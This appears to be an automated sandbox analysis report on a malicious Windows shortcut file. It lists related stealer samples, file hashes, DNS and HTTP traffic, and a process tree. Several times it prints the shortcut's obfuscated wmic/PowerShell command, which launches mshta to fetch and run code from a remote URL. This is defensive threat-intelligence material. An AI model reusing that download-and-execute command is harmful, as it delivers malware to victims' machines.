              • 62.182.18.128
              Transitdokumente.zipGet hashmaliciousUnknownBrowse
              • 62.182.20.50
              Transitdokumente.zipGet hashmaliciousUnknownBrowse
              • 62.182.20.50
              KTi123tZU6Get hashmaliciousUnknownBrowse
              • 62.182.18.121
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19K9esyY0r4G.lnkGet hashmaliciousUnknownBrowse
              • 62.182.21.105
              vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
              • 62.182.21.105
              aD7D9fkpII.exeGet hashmaliciousVidarBrowse
              • 62.182.21.105
              installer.batGet hashmaliciousVidarBrowse
              • 62.182.21.105
              skript.batGet hashmaliciousVidarBrowse
              • 62.182.21.105
              din.exeGet hashmaliciousVidarBrowse
              • 62.182.21.105
              yoda.exeGet hashmaliciousVidarBrowse
              • 62.182.21.105
              lem.exeGet hashmaliciousVidarBrowse
              • 62.182.21.105
              markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
              • 62.182.21.105
              utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
              • 62.182.21.105
              No context
              Process:C:\Windows\System32\svchost.exe
              File Type:data
              Category:dropped
              Size (bytes):1310720
              Entropy (8bit):0.7263264202530545
              Encrypted:false
              SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0F:9JZj5MiKNnNhoxu4
              MD5:AD6323B687033777B72CD7F188E8C052
              SHA1:63A34FA8EBE9DE510E2BED8C050DCB80F16FD140
              SHA-256:C55993CC72BAE2B58B0AE1E72DF348FAB5C3D159EFE90D6EBEA514DB7E08252C
              SHA-512:4593F791723620A7DB6A4D43495703140F6392674866BEF9156235AE9B5DC9164060A7882E87AF29D71C28D1EBDEAE951E7D1CA8EB126D95F42107E78EE01A6D
              Malicious:false
              Reputation:low
              Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
              Process:C:\Windows\System32\svchost.exe
              File Type:Extensible storage user DataBase, version 0x620, checksum 0x63bca91f, page size 16384, DirtyShutdown, Windows version 10.0
              Category:dropped
              Size (bytes):1310720
              Entropy (8bit):0.7555602749730562
              Encrypted:false
              SSDEEP:1536:lSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:lazaSvGJzYj2UlmOlOL
              MD5:DE58EACA263A1A3497876A994D9760B6
              SHA1:8CB13DD35224299389949746716B42093E7DB0F0
              SHA-256:66BB373F63AB050BF974FB44358D08138A094530C900CCC48E8C180DB1505DC9
              SHA-512:1159F5CF3C9B203FC1EDED8EA75B1E7A8301C4D76ACB7507C0D59E19DF8B1D48A2072A375610C6326EDAFA41389581946B3B22846EBBD185C620AEC8D7704C69
              Malicious:false
              Reputation:low
              Preview:c...... .......7.......X\...;...{......................0.e......!...{?.:....|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................zVu:....|.................].y.:....|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\svchost.exe
              File Type:data
              Category:dropped
              Size (bytes):16384
              Entropy (8bit):0.0779630316266901
              Encrypted:false
              SSDEEP:3:6Mi/KYeoas3TNaAPaU1lnhlqlluxmO+l/SNxOf:6Mi/Kzk3TNDPaUplegmOH
              MD5:593C3E28A19404F2D2B783942B54B1F3
              SHA1:5BC384F7FEEE8B0C1DC1C4F5617CEB65CB996C6D
              SHA-256:76DE47098CC923149ED00346803869050803FD17BC58F48E89F3D99862A88330
              SHA-512:8AE010F0030D7CA4BE35862697ECB6F520EC3AB5351A49340A4A6D2218E3564C0D828B8CF229EAF4B947B21C9EC1349342F8C08A15B9E6CE34A850CA66C7011F
              Malicious:false
              Reputation:low
              Preview:&........................................;...{..:....|...!...{?..........!...{?..!...{?..g...!...{?.................].y.:....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):0.7307872139132228
              Encrypted:false
              SSDEEP:3:NlllulF/ll:NllUNll
              MD5:1B9939B408D57BA3B6D8F82BB4B3A3C3
              SHA1:63CCC77CB41EF1BD526EFB37D499AB0BB7EB0446
              SHA-256:ADB9EEF918193307CF7A4935A6DA1A213F8CF051A09445E8E5F790613770A13C
              SHA-512:9B6317B0773EF501013A1337BB7230C164D719130DF7564BF7AC754BB288164FFFEC01DA98C1294F793453B5259F28AA2A5A9725702353F623E0016C20A23949
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:@...e...........................................................
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\svchost.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):55
              Entropy (8bit):4.306461250274409
              Encrypted:false
              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
              MD5:DCA83F08D448911A14C22EBCACC5AD57
              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
              Malicious:false
              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
              Process:C:\Windows\System32\wbem\WMIC.exe
              File Type:ASCII text, with CRLF, CR line terminators
              Category:dropped
              Size (bytes):160
              Entropy (8bit):5.0707031101146125
              Encrypted:false
              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1Mggf/AFJQAiveyzoa:Yw7gJGWMXJXKSOdYiygKkXe/eggaeAin
              MD5:75D7A7A3DEAB5FCF73364873119B1559
              SHA1:DC04115F9BC71DED37917300CCE51D674B8490C9
              SHA-256:DE5664B44D1F6B913FC30DACA45C881C306687B542791CF459D2FF7EFC067136
              SHA-512:FCED7D4B7CAF11BFCD894B627B4392750DA4E791A3DFF0AA7D7D63B4716ED5EA65746D887E7586F0D30E0CC1DC2A85B65D40D81034EE13A7B51E33DC38948198
              Malicious:false
              Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 2360;...ReturnValue = 0;..};....
              File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
              Entropy (8bit):2.496109754764554
              TrID:
              • Windows Shortcut (20020/1) 100.00%
              File name:InExYnlM0N.lnk
              File size:2'010 bytes
              MD5:55e5e8544221031af4684ea083f25a28
              SHA1:05b63920efb1b3dab2da367844fa5f25f9c12bdf
              SHA256:f18660faf2003e959bf103d778002ecc0ae00c9be78b94e490837500099b370c
              SHA512:b829d50f5bf6e7406bf31259398ac8435d96f97cf1a25d1cfc52a44a639467dfbb17aaf97975dbde5687a0a600ac4c2fa0727a4cb2c8459733fba6212ea8133a
              SSDEEP:24:8AyH/BUlgKN4eH+/3/kWNBvLG3euAHqdd79dsHLIQ:89uGeA/lBzG3eKdJ9
              TLSH:884157146AF90B10F3F28E32687AB7208A7B7C4BED128F1D0191418D1422A10FDB6F6B
              File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
              Icon Hash:72d282828e8d8dd5

              General

              Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
              Command Line Argument:process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie"
              Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              TimestampSource PortDest PortSource IPDest IP
              Dec 27, 2024 09:04:56.175038099 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:56.175067902 CET4434970962.182.21.105192.168.2.6
              Dec 27, 2024 09:04:56.176230907 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:56.204341888 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:56.204372883 CET4434970962.182.21.105192.168.2.6
              Dec 27, 2024 09:04:57.771102905 CET4434970962.182.21.105192.168.2.6
              Dec 27, 2024 09:04:57.771190882 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:57.826227903 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:57.826283932 CET4434970962.182.21.105192.168.2.6
              Dec 27, 2024 09:04:57.827788115 CET4434970962.182.21.105192.168.2.6
              Dec 27, 2024 09:04:57.827871084 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:57.830133915 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:57.875341892 CET4434970962.182.21.105192.168.2.6
              Dec 27, 2024 09:04:58.308864117 CET4434970962.182.21.105192.168.2.6
              Dec 27, 2024 09:04:58.308923006 CET4434970962.182.21.105192.168.2.6
              Dec 27, 2024 09:04:58.308932066 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:58.308968067 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:58.311646938 CET49709443192.168.2.662.182.21.105
              Dec 27, 2024 09:04:58.311671972 CET4434970962.182.21.105192.168.2.6
              TimestampSource PortDest PortSource IPDest IP
              Dec 27, 2024 09:04:55.269762993 CET5960453192.168.2.61.1.1.1
              Dec 27, 2024 09:04:56.166892052 CET53596041.1.1.1192.168.2.6
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Dec 27, 2024 09:04:55.269762993 CET192.168.2.61.1.1.10xce4Standard query (0)dimitricostruzioni.chA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Dec 27, 2024 09:04:56.166892052 CET1.1.1.1192.168.2.60xce4No error (0)dimitricostruzioni.ch62.182.21.105A (IP address)IN (0x0001)false
              • dimitricostruzioni.ch
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.64970962.182.21.1054435692C:\Windows\System32\mshta.exe
              TimestampBytes transferredDirectionData
              2024-12-27 08:04:57 UTC358OUTGET /new/files/Documents/vanillecookie HTTP/1.1
              Accept: */*
              Accept-Language: en-CH
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: dimitricostruzioni.ch
              Connection: Keep-Alive
              2024-12-27 08:04:58 UTC430INHTTP/1.1 509 Bandwidth Limit Exceeded
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 904
              date: Fri, 27 Dec 2024 08:04:58 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-12-27 08:04:58 UTC904INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 509 Bandwidth Limit Exceeded</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!i


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:03:04:51
              Start date:27/12/2024
              Path:C:\Windows\System32\wbem\WMIC.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie"
              Imagebase:0x7ff75eb60000
              File size:576'000 bytes
              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:2
              Start time:03:04:51
              Start date:27/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:03:04:51
              Start date:27/12/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/new/files/Documents/vanillecookie
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:03:04:51
              Start date:27/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:03:04:54
              Start date:27/12/2024
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/new/files/Documents/vanillecookie
              Imagebase:0x7ff6157f0000
              File size:14'848 bytes
              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:false

              Target ID:7
              Start time:03:04:57
              Start date:27/12/2024
              Path:C:\Windows\System32\svchost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Imagebase:0x7ff7403e0000
              File size:55'320 bytes
              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              No disassembly